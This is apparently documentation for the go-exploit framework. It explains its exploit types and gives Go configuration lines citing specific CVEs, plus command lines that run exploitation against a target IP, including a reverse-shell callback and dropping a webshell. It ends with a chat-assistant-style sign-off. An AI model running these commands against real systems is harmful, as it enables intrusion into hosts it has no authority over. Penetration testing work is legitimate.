# `go-exploit` Exploit Types

The `go-exploit` framework currently supports five exploit types. These types determine how the command-line interface accepts arguments and define the post-exploitation behavior. The fives exploit types are defined in `config/config.go`:

1. CodeExecution
2. InformationDisclosure
3. Webshell
4. File Format
5. Local

To configure the exploit type in the exploit's `main` function, you can use the `config.New` function for remote exploits as follows:

```go
conf := config.New(config.CodeExecution, supportedC2, "My Target", "CVE-2023-1270", 80)
```

Local exploits (including File Format) omits the default port:

```go
conf := config.NewLocal(config.FileFormat,s upportedC2, "My Target", "CVE-2023-1270")
```

## Examples

### Code Execution

The Code Execution exploit type assumes that the attacker is attempting to exploit a remote target. Depending on the configured command and control (C2) method, the attacker may need to provide local host information or a bind port. Here is an example of invoking verification, version check, and exploitation for a reverse shell using the Code Execution exploit type:

```sh
./exploit -a -v -c -e -rhost 10.12.70.247 -rport 80 -lhost 10.12.70.252 -lport 1270
```

### Information Disclosure

The Information Disclosure exploit type assumes that there is some type of information leak that does not immediately result in code execution. No command and control (C2) is configured for this exploit type. In the `main` function, it would look like this:

```go
conf := config.New(config.InformationDisclosure, []c2.Impl{}, "Minio API", "CVE-2023-28432", 9000)
```

Depending on the specific exploit, you may need to provide a local host and port using the `-lhost` and `-lport` arguments. Here is an example of invoking verification, version check, and exploitation using the Information Disclosure exploit type:

```sh
./exploit -v -c -e -s -rhost 10.12.70.247 -rport 443
```

### Webshell

The WebShell exploit type assumes that the exploit will drop a webshell on the remote host. No command and control (C2) is configured for this exploit type. In the `main` function, it would look like this:

```go
conf := config.New(config.Webshell, []c2.Impl{}, "ThinkPHP", "CVE-2022-47945", 8080)
```

Here is an example of invoking verification, version check, and exploitation using the WebShell exploit type:

```sh
./exploit -v -c -e -s -rhost 10.12.70.247 -rport 443
```

---

I have made some slight modifications for clarity and formatting. If you have any further questions or need additional assistance, feel free to ask!
